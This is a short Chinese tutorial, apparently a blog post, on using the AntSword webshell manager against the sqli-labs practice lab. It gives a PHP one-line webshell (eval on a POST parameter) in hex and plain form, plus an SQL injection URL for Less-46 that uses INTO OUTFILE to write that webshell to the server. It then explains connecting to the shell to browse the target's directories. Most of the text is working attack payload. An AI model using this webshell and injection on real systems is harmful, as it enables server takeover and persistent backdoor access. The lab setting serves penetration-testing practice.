中国蚁剑使用方法

找到mysql配置文件

python 复制代码
secure-file-priv=

工作目录

python 复制代码
D:\tool\huli\gui_webshell\AntSword\AntSword\antSword-master

重点是tool目录后面 前面大家可能都不一样

添加数据

一句话木马

python 复制代码
3C3F706870206576616C28245F504F53545B22636D64225D293B3F3E
翻译过来
<?php eval($_POST["cmd"]);?>

示例天书第46关上传木马

python 复制代码
/?sort=1%20into%20outfile%20"D:\\phpstudy_pro\\WWW\\sql\\sqli-labs-master\\Less-46\\test1.php"%20lines%20terminated%20by%200x3c3f706870206576616c28245f504f53545b22636d64225d293b3f3e

选择你上传一句话木马的url地址 具体到 你上传的文件名

这个参数就是连接密码

完成操作后 可以操作对方的目录

相关推荐
介一安全1 天前
【APK安全】组件安全核心风险与防御指南
网络安全·安全性测试·apk安全
介一安全1 天前
【APK安全】系统管理器安全风险与防御指南
网络安全·安全性测试·apk安全·android测试
emma羊羊2 天前
【文件读写】绕过验证下
网络安全·php·upload·文件读写
云计算练习生2 天前
Linux 操作系统防火墙工具Firewalld常用操作
服务器·网络·网络安全·防火墙·firewalld·linux操作系统
Whoami!2 天前
4-6〔O҉S҉C҉P҉ ◈ 研记〕❘ WEB应用攻击▸文件上传漏洞-A
网络安全·信息安全·文件上传漏洞·oscp
介一安全3 天前
【APK安全】WebView组件的安全风险与防御指南
网络安全·安全性测试·apk安全·android测试
歪歪1003 天前
介绍一下HTTP和WebSocket的头部信息
网络·websocket·网络协议·http·网络安全·信息与通信
Bruce_Liuxiaowei3 天前
Kerberos协议深度解析:工作原理与安全实践
运维·windows·安全·网络安全
运维行者_3 天前
OpManager 与 iOS 26:开启 IT 运维新时代
运维·网络·网络协议·网络安全·ios·iphone·告警
歪歪1003 天前
如何在项目中选择使用HTTP还是WebSocket?
网络·websocket·网络协议·计算机网络·http·网络安全